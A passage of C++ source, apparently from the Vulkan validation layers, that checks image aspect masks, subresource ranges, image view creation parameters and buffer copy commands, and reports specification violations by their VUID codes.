            skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, objectType, HandleToUint64(image), vuid,
                            "%s: Depth-only image formats must have the VK_IMAGE_ASPECT_DEPTH_BIT set.", func_name);
        } else if ((aspect_mask & VK_IMAGE_ASPECT_DEPTH_BIT) != aspect_mask) {
            skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, objectType, HandleToUint64(image), vuid,
                            "%s: Depth-only image formats can have only the VK_IMAGE_ASPECT_DEPTH_BIT set.", func_name);
        }
    } else if (FormatIsStencilOnly(format)) {
        if ((aspect_mask & VK_IMAGE_ASPECT_STENCIL_BIT) != VK_IMAGE_ASPECT_STENCIL_BIT) {
            skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, objectType, HandleToUint64(image), vuid,
                            "%s: Stencil-only image formats must have the VK_IMAGE_ASPECT_STENCIL_BIT set.", func_name);
        } else if ((aspect_mask & VK_IMAGE_ASPECT_STENCIL_BIT) != aspect_mask) {
            skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, objectType, HandleToUint64(image), vuid,
                            "%s: Stencil-only image formats can have only the VK_IMAGE_ASPECT_STENCIL_BIT set.", func_name);
        }
    } else if (FormatIsMultiplane(format)) {
        // Multi-planar formats allow COLOR plus per-plane aspect bits; PLANE_2 only for 3-plane formats.
        VkImageAspectFlags valid_flags = VK_IMAGE_ASPECT_COLOR_BIT | VK_IMAGE_ASPECT_PLANE_0_BIT | VK_IMAGE_ASPECT_PLANE_1_BIT;
        if (3 == FormatPlaneCount(format)) {
            valid_flags = valid_flags | VK_IMAGE_ASPECT_PLANE_2_BIT;
        }
        if ((aspect_mask
& valid_flags) != aspect_mask) {
            skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, objectType, HandleToUint64(image), vuid,
                            "%s: Multi-plane image formats may have only VK_IMAGE_ASPECT_COLOR_BIT or VK_IMAGE_ASPECT_PLANE_n_BITs "
                            "set, where n = [0, 1, 2].",
                            func_name);
        }
    }
    return skip;
}

// Validate a VkImageSubresourceRange against an image's mip and layer counts, reporting the caller-supplied
// per-field error VUIDs.  VK_REMAINING_MIP_LEVELS / VK_REMAINING_ARRAY_LAYERS are always considered valid counts.
bool CoreChecks::ValidateImageSubresourceRange(const uint32_t image_mip_count, const uint32_t image_layer_count,
                                               const VkImageSubresourceRange &subresourceRange, const char *cmd_name,
                                               const char *param_name, const char *image_layer_count_var_name,
                                               const uint64_t image_handle, SubresourceRangeErrorCodes errorCodes) {
    bool skip = false;

    // Validate mip levels
    if (subresourceRange.baseMipLevel >= image_mip_count) {
        skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT, image_handle,
                        errorCodes.base_mip_err,
                        "%s: %s.baseMipLevel (= %" PRIu32
                        ") is greater or equal to the mip level count of the image (i.e. greater or equal to %" PRIu32 ").",
                        cmd_name, param_name, subresourceRange.baseMipLevel, image_mip_count);
    }

    if (subresourceRange.levelCount != VK_REMAINING_MIP_LEVELS) {
        if (subresourceRange.levelCount == 0) {
            skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT, image_handle,
                            errorCodes.mip_count_err, "%s: %s.levelCount is 0.", cmd_name, param_name);
        } else {
            // 64-bit sum so base + count cannot wrap around uint32_t
            const uint64_t necessary_mip_count = uint64_t{subresourceRange.baseMipLevel} + uint64_t{subresourceRange.levelCount};

            if (necessary_mip_count > image_mip_count) {
                skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT, image_handle,
                                errorCodes.mip_count_err,
                                "%s: %s.baseMipLevel + .levelCount (= %" PRIu32 " + %" PRIu32 " = %" PRIu64
                                ") is greater than the mip level count of the image (i.e. greater than %" PRIu32 ").",
                                cmd_name, param_name, subresourceRange.baseMipLevel, subresourceRange.levelCount,
                                necessary_mip_count, image_mip_count);
            }
        }
    }

    // Validate array layers
    if (subresourceRange.baseArrayLayer >= image_layer_count) {
        skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT, image_handle,
                        errorCodes.base_layer_err,
                        "%s: %s.baseArrayLayer (= %" PRIu32
                        ") is greater or equal to the %s of the image when it was created (i.e. greater or equal to %" PRIu32 ").",
                        cmd_name, param_name, subresourceRange.baseArrayLayer, image_layer_count_var_name, image_layer_count);
    }

    if (subresourceRange.layerCount != VK_REMAINING_ARRAY_LAYERS) {
        if (subresourceRange.layerCount == 0) {
            skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT, image_handle,
                            errorCodes.layer_count_err, "%s: %s.layerCount is 0.", cmd_name, param_name);
        } else {
            // 64-bit sum so base + count cannot wrap around uint32_t
            const uint64_t necessary_layer_count =
                uint64_t{subresourceRange.baseArrayLayer} + uint64_t{subresourceRange.layerCount};

            if (necessary_layer_count > image_layer_count) {
                skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT, image_handle,
                                errorCodes.layer_count_err,
                                "%s: %s.baseArrayLayer + .layerCount (= %" PRIu32 " + %" PRIu32 " = %" PRIu64
                                ") is greater than the %s of the image when it was created (i.e. greater than %" PRIu32 ").",
                                cmd_name, param_name, subresourceRange.baseArrayLayer, subresourceRange.layerCount,
                                necessary_layer_count, image_layer_count_var_name, image_layer_count);
            }
        }
    }

    return skip;
}

// Choose the correct VUIDs for vkCreateImageView subresource-range validation, accounting for the
// KHR_maintenance1 case where a 2D(_ARRAY) view of a slicable 3D image validates layers against
// extent.depth rather than arrayLayers, then defer to ValidateImageSubresourceRange().
bool CoreChecks::ValidateCreateImageViewSubresourceRange(const IMAGE_STATE *image_state, bool is_imageview_2d_type,
                                                         const VkImageSubresourceRange &subresourceRange) {
    bool is_khr_maintenance1 = GetDeviceExtensions()->vk_khr_maintenance1;
    bool is_image_slicable = image_state->createInfo.imageType == VK_IMAGE_TYPE_3D &&
                             (image_state->createInfo.flags & VK_IMAGE_CREATE_2D_ARRAY_COMPATIBLE_BIT_KHR);
    bool is_3D_to_2D_map = is_khr_maintenance1 && is_image_slicable && is_imageview_2d_type;

    const auto image_layer_count = is_3D_to_2D_map ? image_state->createInfo.extent.depth : image_state->createInfo.arrayLayers;
    const auto image_layer_count_var_name = is_3D_to_2D_map ? "extent.depth" : "arrayLayers";

    SubresourceRangeErrorCodes subresourceRangeErrorCodes = {};
    subresourceRangeErrorCodes.base_mip_err = "VUID-VkImageViewCreateInfo-subresourceRange-01478";
    subresourceRangeErrorCodes.mip_count_err = "VUID-VkImageViewCreateInfo-subresourceRange-01718";
    subresourceRangeErrorCodes.base_layer_err = is_khr_maintenance1
                                                    ? (is_3D_to_2D_map ? "VUID-VkImageViewCreateInfo-image-01484"
                                                                       : "VUID-VkImageViewCreateInfo-image-01482")
                                                    : "VUID-VkImageViewCreateInfo-subresourceRange-01480";
    subresourceRangeErrorCodes.layer_count_err =
        is_khr_maintenance1
            ? (is_3D_to_2D_map ?
"VUID-VkImageViewCreateInfo-subresourceRange-01485" : "VUID-VkImageViewCreateInfo-subresourceRange-01483") : "VUID-VkImageViewCreateInfo-subresourceRange-01719"; return ValidateImageSubresourceRange(image_state->createInfo.mipLevels, image_layer_count, subresourceRange, "vkCreateImageView", "pCreateInfo->subresourceRange", image_layer_count_var_name, HandleToUint64(image_state->image), subresourceRangeErrorCodes); } bool CoreChecks::ValidateCmdClearColorSubresourceRange(const IMAGE_STATE *image_state, const VkImageSubresourceRange &subresourceRange, const char *param_name) { SubresourceRangeErrorCodes subresourceRangeErrorCodes = {}; subresourceRangeErrorCodes.base_mip_err = "VUID-vkCmdClearColorImage-baseMipLevel-01470"; subresourceRangeErrorCodes.mip_count_err = "VUID-vkCmdClearColorImage-pRanges-01692"; subresourceRangeErrorCodes.base_layer_err = "VUID-vkCmdClearColorImage-baseArrayLayer-01472"; subresourceRangeErrorCodes.layer_count_err = "VUID-vkCmdClearColorImage-pRanges-01693"; return ValidateImageSubresourceRange(image_state->createInfo.mipLevels, image_state->createInfo.arrayLayers, subresourceRange, "vkCmdClearColorImage", param_name, "arrayLayers", HandleToUint64(image_state->image), subresourceRangeErrorCodes); } bool CoreChecks::ValidateCmdClearDepthSubresourceRange(const IMAGE_STATE *image_state, const VkImageSubresourceRange &subresourceRange, const char *param_name) { SubresourceRangeErrorCodes subresourceRangeErrorCodes = {}; subresourceRangeErrorCodes.base_mip_err = "VUID-vkCmdClearDepthStencilImage-baseMipLevel-01474"; subresourceRangeErrorCodes.mip_count_err = "VUID-vkCmdClearDepthStencilImage-pRanges-01694"; subresourceRangeErrorCodes.base_layer_err = "VUID-vkCmdClearDepthStencilImage-baseArrayLayer-01476"; subresourceRangeErrorCodes.layer_count_err = "VUID-vkCmdClearDepthStencilImage-pRanges-01695"; return ValidateImageSubresourceRange(image_state->createInfo.mipLevels, image_state->createInfo.arrayLayers, subresourceRange, 
"vkCmdClearDepthStencilImage", param_name, "arrayLayers", HandleToUint64(image_state->image), subresourceRangeErrorCodes); } bool CoreChecks::ValidateImageBarrierSubresourceRange(const IMAGE_STATE *image_state, const VkImageSubresourceRange &subresourceRange, const char *cmd_name, const char *param_name) { SubresourceRangeErrorCodes subresourceRangeErrorCodes = {}; subresourceRangeErrorCodes.base_mip_err = "VUID-VkImageMemoryBarrier-subresourceRange-01486"; subresourceRangeErrorCodes.mip_count_err = "VUID-VkImageMemoryBarrier-subresourceRange-01724"; subresourceRangeErrorCodes.base_layer_err = "VUID-VkImageMemoryBarrier-subresourceRange-01488"; subresourceRangeErrorCodes.layer_count_err = "VUID-VkImageMemoryBarrier-subresourceRange-01725"; return ValidateImageSubresourceRange(image_state->createInfo.mipLevels, image_state->createInfo.arrayLayers, subresourceRange, cmd_name, param_name, "arrayLayers", HandleToUint64(image_state->image), subresourceRangeErrorCodes); } bool CoreChecks::PreCallValidateCreateImageView(VkDevice device, const VkImageViewCreateInfo *pCreateInfo, const VkAllocationCallbacks *pAllocator, VkImageView *pView) { bool skip = false; IMAGE_STATE *image_state = GetImageState(pCreateInfo->image); if (image_state) { skip |= ValidateImageUsageFlags( image_state, VK_IMAGE_USAGE_SAMPLED_BIT | VK_IMAGE_USAGE_STORAGE_BIT | VK_IMAGE_USAGE_INPUT_ATTACHMENT_BIT | VK_IMAGE_USAGE_DEPTH_STENCIL_ATTACHMENT_BIT | VK_IMAGE_USAGE_COLOR_ATTACHMENT_BIT | VK_IMAGE_USAGE_SHADING_RATE_IMAGE_BIT_NV, false, kVUIDUndefined, "vkCreateImageView()", "VK_IMAGE_USAGE_[SAMPLED|STORAGE|COLOR_ATTACHMENT|DEPTH_STENCIL_ATTACHMENT|INPUT_ATTACHMENT|SHADING_RATE_IMAGE]_BIT"); // If this isn't a sparse image, it needs to have memory backing it at CreateImageView time skip |= ValidateMemoryIsBoundToImage(image_state, "vkCreateImageView()", "VUID-VkImageViewCreateInfo-image-01020"); // Checks imported from image layer skip |= ValidateCreateImageViewSubresourceRange( image_state, 
pCreateInfo->viewType == VK_IMAGE_VIEW_TYPE_2D || pCreateInfo->viewType == VK_IMAGE_VIEW_TYPE_2D_ARRAY,
            pCreateInfo->subresourceRange);

        // Snapshot image/view creation parameters used by the checks below.
        VkImageCreateFlags image_flags = image_state->createInfo.flags;
        VkFormat image_format = image_state->createInfo.format;
        VkImageUsageFlags image_usage = image_state->createInfo.usage;
        VkImageTiling image_tiling = image_state->createInfo.tiling;
        VkFormat view_format = pCreateInfo->format;
        VkImageAspectFlags aspect_mask = pCreateInfo->subresourceRange.aspectMask;
        VkImageType image_type = image_state->createInfo.imageType;
        VkImageViewType view_type = pCreateInfo->viewType;

        // If there's a chained VkImageViewUsageCreateInfo struct, modify image_usage to match
        auto chained_ivuci_struct = lvl_find_in_chain<VkImageViewUsageCreateInfoKHR>(pCreateInfo->pNext);
        if (chained_ivuci_struct) {
            // The chained usage must be a subset of the image's usage.
            if (chained_ivuci_struct->usage & ~image_usage) {
                std::stringstream ss;
                ss << "vkCreateImageView(): Chained VkImageViewUsageCreateInfo usage field (0x" << std::hex
                   << chained_ivuci_struct->usage << ") must not include flags not present in underlying image's usage (0x"
                   << image_usage << ").";
                skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT,
                                HandleToUint64(pCreateInfo->image), "VUID-VkImageViewUsageCreateInfo-usage-01587", "%s",
                                ss.str().c_str());
            }

            image_usage = chained_ivuci_struct->usage;
        }

        // Validate VK_IMAGE_CREATE_MUTABLE_FORMAT_BIT state, if view/image formats differ
        if ((image_flags & VK_IMAGE_CREATE_MUTABLE_FORMAT_BIT) && (image_format != view_format)) {
            if (FormatIsMultiplane(image_format)) {
                // View format must match the multiplane compatible format
                uint32_t plane = 3;  // invalid
                switch (aspect_mask) {
                    case VK_IMAGE_ASPECT_PLANE_0_BIT:
                        plane = 0;
                        break;
                    case VK_IMAGE_ASPECT_PLANE_1_BIT:
                        plane = 1;
                        break;
                    case VK_IMAGE_ASPECT_PLANE_2_BIT:
                        plane = 2;
                        break;
                    default:
                        break;
                }
                VkFormat compat_format = FindMultiplaneCompatibleFormat(image_format, plane);
                if (view_format != compat_format) {
                    std::stringstream ss;
                    ss << "vkCreateImageView(): ImageView format " << string_VkFormat(view_format)
                       << " is not compatible with plane " << plane << " of underlying image format "
                       << string_VkFormat(image_format) << ", must be " << string_VkFormat(compat_format) << ".";
                    skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT,
                                    HandleToUint64(pCreateInfo->image), "VUID-VkImageViewCreateInfo-image-01586", "%s",
                                    ss.str().c_str());
                }
            } else {
                // Unless maintenance2's BLOCK_TEXEL_VIEW_COMPATIBLE is in play, the formats must share a compatibility class.
                if ((!GetDeviceExtensions()->vk_khr_maintenance2 ||
                     !(image_flags & VK_IMAGE_CREATE_BLOCK_TEXEL_VIEW_COMPATIBLE_BIT_KHR))) {
                    // Format MUST be compatible (in the same format compatibility class) as the format the image was created with
                    if (FormatCompatibilityClass(image_format) != FormatCompatibilityClass(view_format)) {
                        std::stringstream ss;
                        ss << "vkCreateImageView(): ImageView format " << string_VkFormat(view_format)
                           << " is not in the same format compatibility class as image ("
                           << report_data->FormatHandle(pCreateInfo->image).c_str() << ") format "
                           << string_VkFormat(image_format)
                           << ". Images created with the VK_IMAGE_CREATE_MUTABLE_FORMAT BIT "
                           << "can support ImageViews with differing formats but they must be in the same compatibility class.";
                        skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT,
                                        HandleToUint64(pCreateInfo->image), "VUID-VkImageViewCreateInfo-image-01018", "%s",
                                        ss.str().c_str());
                    }
                }
            }
        } else {
            // Format MUST be IDENTICAL to the format the image was created with
            if (image_format != view_format) {
                std::stringstream ss;
                ss << "vkCreateImageView() format " << string_VkFormat(view_format) << " differs from image "
                   << report_data->FormatHandle(pCreateInfo->image).c_str() << " format " << string_VkFormat(image_format)
                   << ". Formats MUST be IDENTICAL unless VK_IMAGE_CREATE_MUTABLE_FORMAT BIT was set on image creation.";
                skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT,
                                HandleToUint64(pCreateInfo->image), "VUID-VkImageViewCreateInfo-image-01019", "%s",
                                ss.str().c_str());
            }
        }

        // Validate correct image aspect bits for desired formats and format consistency
        // NOTE(review): only four arguments passed — relies on a default value for ValidateImageAspectMask's
        // `vuid` parameter declared elsewhere; confirm against the header.
        skip |= ValidateImageAspectMask(image_state->image, image_format, aspect_mask, "vkCreateImageView()");

        // View type must be compatible with the image type (1D/2D; 3D handled in the next case below).
        switch (image_type) {
            case VK_IMAGE_TYPE_1D:
                if (view_type != VK_IMAGE_VIEW_TYPE_1D && view_type != VK_IMAGE_VIEW_TYPE_1D_ARRAY) {
                    skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT,
                                    HandleToUint64(pCreateInfo->image), "VUID-VkImageViewCreateInfo-subResourceRange-01021",
                                    "vkCreateImageView(): pCreateInfo->viewType %s is not compatible with image type %s.",
                                    string_VkImageViewType(view_type), string_VkImageType(image_type));
                }
                break;
            case VK_IMAGE_TYPE_2D:
                if (view_type != VK_IMAGE_VIEW_TYPE_2D && view_type != VK_IMAGE_VIEW_TYPE_2D_ARRAY) {
                    // Cube(-array) views are allowed only when the image was created cube-compatible.
                    if ((view_type == VK_IMAGE_VIEW_TYPE_CUBE || view_type == VK_IMAGE_VIEW_TYPE_CUBE_ARRAY) &&
                        !(image_flags & VK_IMAGE_CREATE_CUBE_COMPATIBLE_BIT)) {
                        skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT,
                                        HandleToUint64(pCreateInfo->image), "VUID-VkImageViewCreateInfo-image-01003",
                                        "vkCreateImageView(): pCreateInfo->viewType %s is not compatible with image type %s.",
                                        string_VkImageViewType(view_type), string_VkImageType(image_type));
                    } else if (view_type != VK_IMAGE_VIEW_TYPE_CUBE && view_type != VK_IMAGE_VIEW_TYPE_CUBE_ARRAY) {
                        skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT,
                                        HandleToUint64(pCreateInfo->image), "VUID-VkImageViewCreateInfo-subResourceRange-01021",
                                        "vkCreateImageView(): pCreateInfo->viewType %s is not compatible with image type %s.",
                                        string_VkImageViewType(view_type), string_VkImageType(image_type));
}
                }
                break;
            case VK_IMAGE_TYPE_3D:
                // With maintenance1, 2D(_ARRAY) views of a 2D_ARRAY_COMPATIBLE (non-sparse) 3D image are allowed.
                if (GetDeviceExtensions()->vk_khr_maintenance1) {
                    if (view_type != VK_IMAGE_VIEW_TYPE_3D) {
                        if ((view_type == VK_IMAGE_VIEW_TYPE_2D || view_type == VK_IMAGE_VIEW_TYPE_2D_ARRAY)) {
                            if (!(image_flags & VK_IMAGE_CREATE_2D_ARRAY_COMPATIBLE_BIT_KHR)) {
                                skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT,
                                                HandleToUint64(pCreateInfo->image), "VUID-VkImageViewCreateInfo-image-01005",
                                                "vkCreateImageView(): pCreateInfo->viewType %s is not compatible with image type %s.",
                                                string_VkImageViewType(view_type), string_VkImageType(image_type));
                            } else if ((image_flags & (VK_IMAGE_CREATE_SPARSE_BINDING_BIT | VK_IMAGE_CREATE_SPARSE_RESIDENCY_BIT |
                                                       VK_IMAGE_CREATE_SPARSE_ALIASED_BIT))) {
                                skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT,
                                                HandleToUint64(pCreateInfo->image),
                                                "VUID-VkImageViewCreateInfo-subResourceRange-01021",
                                                "vkCreateImageView(): pCreateInfo->viewType %s is not compatible with image type %s "
                                                "when the VK_IMAGE_CREATE_SPARSE_BINDING_BIT, VK_IMAGE_CREATE_SPARSE_RESIDENCY_BIT, or "
                                                "VK_IMAGE_CREATE_SPARSE_ALIASED_BIT flags are enabled.",
                                                string_VkImageViewType(view_type), string_VkImageType(image_type));
                            }
                        } else {
                            skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT,
                                            HandleToUint64(pCreateInfo->image), "VUID-VkImageViewCreateInfo-subResourceRange-01021",
                                            "vkCreateImageView(): pCreateInfo->viewType %s is not compatible with image type %s.",
                                            string_VkImageViewType(view_type), string_VkImageType(image_type));
                        }
                    }
                } else {
                    // Without maintenance1, only a 3D view of a 3D image is valid.
                    if (view_type != VK_IMAGE_VIEW_TYPE_3D) {
                        skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT,
                                        HandleToUint64(pCreateInfo->image), "VUID-VkImageViewCreateInfo-subResourceRange-01021",
                                        "vkCreateImageView(): pCreateInfo->viewType %s is not compatible with image type %s.",
                                        string_VkImageViewType(view_type), string_VkImageType(image_type));
                    }
                }
                break;
            default:
                break;
        }

        // External format checks needed when VK_ANDROID_external_memory_android_hardware_buffer enabled
        if (GetDeviceExtensions()->vk_android_external_memory_android_hardware_buffer) {
            skip |= ValidateCreateImageViewANDROID(pCreateInfo);
        }

        VkFormatProperties format_properties = GetPDFormatProperties(view_format);
        // NOTE(review): bitwise & on a non-bitmask enum; selects linear features because
        // VK_IMAGE_TILING_LINEAR == 1, but an `==` comparison would state the intent more clearly.
        VkFormatFeatureFlags tiling_features = (image_tiling & VK_IMAGE_TILING_LINEAR) ? format_properties.linearTilingFeatures
                                                                                       : format_properties.optimalTilingFeatures;
        // The view's format/tiling combination must support every requested usage.
        if (tiling_features == 0) {
            skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT,
                            HandleToUint64(pCreateInfo->image), "VUID-VkImageViewCreateInfo-None-02273",
                            "vkCreateImageView(): pCreateInfo->format %s with tiling %s has no supported format features on this "
                            "physical device.",
                            string_VkFormat(view_format), string_VkImageTiling(image_tiling));
        } else if ((image_usage & VK_IMAGE_USAGE_SAMPLED_BIT) && !(tiling_features & VK_FORMAT_FEATURE_SAMPLED_IMAGE_BIT)) {
            skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT,
                            HandleToUint64(pCreateInfo->image), "VUID-VkImageViewCreateInfo-usage-02274",
                            "vkCreateImageView(): pCreateInfo->format %s with tiling %s does not support usage that includes "
                            "VK_IMAGE_USAGE_SAMPLED_BIT.",
                            string_VkFormat(view_format), string_VkImageTiling(image_tiling));
        } else if ((image_usage & VK_IMAGE_USAGE_STORAGE_BIT) && !(tiling_features & VK_FORMAT_FEATURE_STORAGE_IMAGE_BIT)) {
            skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT,
                            HandleToUint64(pCreateInfo->image), "VUID-VkImageViewCreateInfo-usage-02275",
                            "vkCreateImageView(): pCreateInfo->format %s with tiling %s does not support usage that includes "
                            "VK_IMAGE_USAGE_STORAGE_BIT.",
                            string_VkFormat(view_format), string_VkImageTiling(image_tiling));
        } else if ((image_usage & VK_IMAGE_USAGE_COLOR_ATTACHMENT_BIT) &&
                   !(tiling_features & VK_FORMAT_FEATURE_COLOR_ATTACHMENT_BIT)) {
            skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT,
                            HandleToUint64(pCreateInfo->image), "VUID-VkImageViewCreateInfo-usage-02276",
                            "vkCreateImageView(): pCreateInfo->format %s with tiling %s does not support usage that includes "
                            "VK_IMAGE_USAGE_COLOR_ATTACHMENT_BIT.",
                            string_VkFormat(view_format), string_VkImageTiling(image_tiling));
        } else if ((image_usage & VK_IMAGE_USAGE_DEPTH_STENCIL_ATTACHMENT_BIT) &&
                   !(tiling_features & VK_FORMAT_FEATURE_DEPTH_STENCIL_ATTACHMENT_BIT)) {
            skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT,
                            HandleToUint64(pCreateInfo->image), "VUID-VkImageViewCreateInfo-usage-02277",
                            "vkCreateImageView(): pCreateInfo->format %s with tiling %s does not support usage that includes "
                            "VK_IMAGE_USAGE_DEPTH_STENCIL_ATTACHMENT_BIT.",
                            string_VkFormat(view_format), string_VkImageTiling(image_tiling));
        }

        // NV shading-rate-image views must be 2D(_ARRAY) and R8_UINT.
        if (image_usage & VK_IMAGE_USAGE_SHADING_RATE_IMAGE_BIT_NV) {
            if (view_type != VK_IMAGE_VIEW_TYPE_2D && view_type != VK_IMAGE_VIEW_TYPE_2D_ARRAY) {
                skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT,
                                HandleToUint64(pCreateInfo->image), "VUID-VkImageViewCreateInfo-image-02086",
                                "vkCreateImageView() If image was created with usage containing "
                                "VK_IMAGE_USAGE_SHADING_RATE_IMAGE_BIT_NV, viewType must be "
                                "VK_IMAGE_VIEW_TYPE_2D or VK_IMAGE_VIEW_TYPE_2D_ARRAY.");
            }
            if (view_format != VK_FORMAT_R8_UINT) {
                skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT,
                                HandleToUint64(pCreateInfo->image), "VUID-VkImageViewCreateInfo-image-02087",
                                "vkCreateImageView() If image was created with usage containing "
                                "VK_IMAGE_USAGE_SHADING_RATE_IMAGE_BIT_NV, format must be VK_FORMAT_R8_UINT.");
            }
        }
    }
    return skip;
}

// Record a successfully created image view and resolve VK_REMAINING_* sentinels in its stored subresource range.
void CoreChecks::PostCallRecordCreateImageView(VkDevice device, const VkImageViewCreateInfo *pCreateInfo,
                                              const VkAllocationCallbacks
*pAllocator, VkImageView *pView, VkResult result) {
    if (result != VK_SUCCESS) return;
    auto image_view_map = GetImageViewMap();
    (*image_view_map)[*pView] = std::unique_ptr<IMAGE_VIEW_STATE>(new IMAGE_VIEW_STATE(*pView, pCreateInfo));

    // Replace VK_REMAINING_MIP_LEVELS / VK_REMAINING_ARRAY_LAYERS with concrete counts from the image.
    auto image_state = GetImageState(pCreateInfo->image);
    auto &sub_res_range = (*image_view_map)[*pView].get()->create_info.subresourceRange;
    sub_res_range.levelCount = ResolveRemainingLevels(&sub_res_range, image_state->createInfo.mipLevels);
    sub_res_range.layerCount = ResolveRemainingLayers(&sub_res_range, image_state->createInfo.arrayLayers);
}

// Validate vkCmdCopyBuffer(): memory binding, usage flags, queue capability, command state, and render-pass scope.
bool CoreChecks::PreCallValidateCmdCopyBuffer(VkCommandBuffer commandBuffer, VkBuffer srcBuffer, VkBuffer dstBuffer,
                                              uint32_t regionCount, const VkBufferCopy *pRegions) {
    auto cb_node = GetCBNode(commandBuffer);
    auto src_buffer_state = GetBufferState(srcBuffer);
    auto dst_buffer_state = GetBufferState(dstBuffer);

    bool skip = false;
    skip |= ValidateMemoryIsBoundToBuffer(src_buffer_state, "vkCmdCopyBuffer()", "VUID-vkCmdCopyBuffer-srcBuffer-00119");
    skip |= ValidateMemoryIsBoundToBuffer(dst_buffer_state, "vkCmdCopyBuffer()", "VUID-vkCmdCopyBuffer-dstBuffer-00121");
    // Validate that SRC & DST buffers have correct usage flags set
    skip |= ValidateBufferUsageFlags(src_buffer_state, VK_BUFFER_USAGE_TRANSFER_SRC_BIT, true,
                                     "VUID-vkCmdCopyBuffer-srcBuffer-00118", "vkCmdCopyBuffer()",
                                     "VK_BUFFER_USAGE_TRANSFER_SRC_BIT");
    skip |= ValidateBufferUsageFlags(dst_buffer_state, VK_BUFFER_USAGE_TRANSFER_DST_BIT, true,
                                     "VUID-vkCmdCopyBuffer-dstBuffer-00120", "vkCmdCopyBuffer()",
                                     "VK_BUFFER_USAGE_TRANSFER_DST_BIT");
    skip |= ValidateCmdQueueFlags(cb_node, "vkCmdCopyBuffer()",
                                  VK_QUEUE_TRANSFER_BIT | VK_QUEUE_GRAPHICS_BIT | VK_QUEUE_COMPUTE_BIT,
                                  "VUID-vkCmdCopyBuffer-commandBuffer-cmdpool");
    skip |= ValidateCmd(cb_node, CMD_COPYBUFFER, "vkCmdCopyBuffer()");
    skip |= InsideRenderPass(cb_node, "vkCmdCopyBuffer()", "VUID-vkCmdCopyBuffer-renderpass");
    return skip;
}

// Record vkCmdCopyBuffer: bind both buffers to the command buffer so their lifetimes are tracked.
void CoreChecks::PreCallRecordCmdCopyBuffer(VkCommandBuffer commandBuffer, VkBuffer srcBuffer, VkBuffer dstBuffer,
                                            uint32_t regionCount, const VkBufferCopy *pRegions) {
    auto cb_node = GetCBNode(commandBuffer);
    auto src_buffer_state = GetBufferState(srcBuffer);
    auto dst_buffer_state = GetBufferState(dstBuffer);

    // Update bindings between buffers and cmd buffer
    AddCommandBufferBindingBuffer(cb_node, src_buffer_state);
    AddCommandBufferBindingBuffer(cb_node, dst_buffer_state);
}

// Report an error if the buffer is unknown (double destroy) or still in use by a command buffer.
bool CoreChecks::ValidateIdleBuffer(VkBuffer buffer) {
    bool skip = false;
    auto buffer_state = GetBufferState(buffer);
    if (!buffer_state) {
        skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_BUFFER_EXT, HandleToUint64(buffer),
                        kVUID_Core_DrawState_DoubleDestroy, "Cannot free buffer %s that has not been allocated.",
                        report_data->FormatHandle(buffer).c_str());
    } else {
        if (buffer_state->in_use.load()) {
